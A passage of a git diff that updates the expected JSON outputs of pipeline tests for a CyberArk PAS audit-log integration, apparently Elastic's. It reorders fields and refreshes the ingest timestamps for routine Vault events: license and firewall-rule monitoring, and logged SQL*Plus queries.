@@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "monitor license expiration date end", - "ingested": "2021-12-09T13:36:58.261598700Z", + "ingested": "2021-12-14T14:42:25.959296427Z", "original": "\u003c5\u003e1 2021-03-09T10:17:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:17:54\",\"IsoTimestamp\":\"2021-03-09T10:17:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"356\",\"Desc\":\"Monitor License Expiration Date end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor License Expiration Date end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor License Expiration Date end\",\"GatewayStation\":\"\"}}}", "code": "356", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-357-monitor-fw-rules-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-357-monitor-fw-rules-start.log-expected.json index 13412bbe6b3..33f768164b8 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-357-monitor-fw-rules-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-357-monitor-fw-rules-start.log-expected.json 
@@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "monitor fw rules start", - "ingested": "2021-12-09T13:36:58.358906700Z", + "ingested": "2021-12-14T14:42:26.067599176Z", "original": "\u003c5\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"357\",\"Desc\":\"Monitor FW rules start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor FW rules start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor FW rules start\",\"GatewayStation\":\"\"}}}", "code": "357", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { 
@@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "monitor fw rules start", - "ingested": "2021-12-09T13:36:58.358915100Z", + "ingested": "2021-12-14T14:42:26.067602188Z", "original": "Mar 08 02:32:56 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"357\",\"Desc\":\"Monitor FW rules start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor FW rules start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor FW rules start\",\"GatewayStation\":\"\"}}}", "code": "357", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-358-monitor-fw-rules-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-358-monitor-fw-rules-end.log-expected.json index 9c47570daba..b123d1b5172 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-358-monitor-fw-rules-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-358-monitor-fw-rules-end.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "monitor fw rules end", - "ingested": "2021-12-09T13:36:58.519410400Z", + "ingested": "2021-12-14T14:42:26.249864020Z", "original": "\u003c5\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"358\",\"Desc\":\"Monitor FW Rules end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor FW Rules end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor FW Rules end\",\"GatewayStation\":\"\"}}}", "code": "358", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "monitor fw rules end", - "ingested": "2021-12-09T13:36:58.519418700Z", + "ingested": "2021-12-14T14:42:26.249866375Z", "original": "Mar 08 02:32:56 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"358\",\"Desc\":\"Monitor FW Rules end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor FW Rules end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor FW Rules end\",\"GatewayStation\":\"\"}}}", "code": "358", "kind": "event" 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-359-sql-command.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-359-sql-command.log-expected.json index 32bd76af23a..44997b75ba2 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-359-sql-command.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-359-sql-command.log-expected.json 
@@ -102,7 +102,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683100800Z", + "ingested": "2021-12-14T14:42:26.430581523Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT USER FROM DUAL;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=69B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT USER FROM 
DUAL;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=69B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", 
@@ -221,7 +221,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683108500Z", + "ingested": "2021-12-14T14:42:26.430584860Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=BEGIN DBMS_OUTPUT.DISABLE\\\\; END\\\\;;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=123B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=BEGIN DBMS_OUTPUT.DISABLE\\\\; 
END\\\\;;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=123B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", 
@@ -340,7 +340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683112Z", + "ingested": "2021-12-14T14:42:26.430585418Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT ATTRIBUTE,SCOPE,NUMERIC_VALUE,CHAR_VALUE,DATE_VALUE FROM SYSTEM.PRODUCT_PRIVS WHERE (UPPER('SQL*Plus') LIKE UPPER(PRODUCT)) AND (UPPER(USER) LIKE USERID);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=187B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" 
Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT 
ATTRIBUTE,SCOPE,NUMERIC_VALUE,CHAR_VALUE,DATE_VALUE FROM SYSTEM.PRODUCT_PRIVS WHERE (UPPER('SQL*Plus') LIKE UPPER(PRODUCT)) AND (UPPER(USER) LIKE USERID);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=187B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", 
@@ -459,7 +459,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683116100Z", + "ingested": "2021-12-14T14:42:26.430587305Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT CHAR_VALUE FROM SYSTEM.PRODUCT_PRIVS WHERE (UPPER('SQL*Plus') LIKE UPPER(PRODUCT)) AND ((UPPER(USER) LIKE USERID) OR (USERID \\\\= 'PUBLIC')) AND (UPPER(ATTRIBUTE) \\\\= 'ROLES');ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=380B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty 
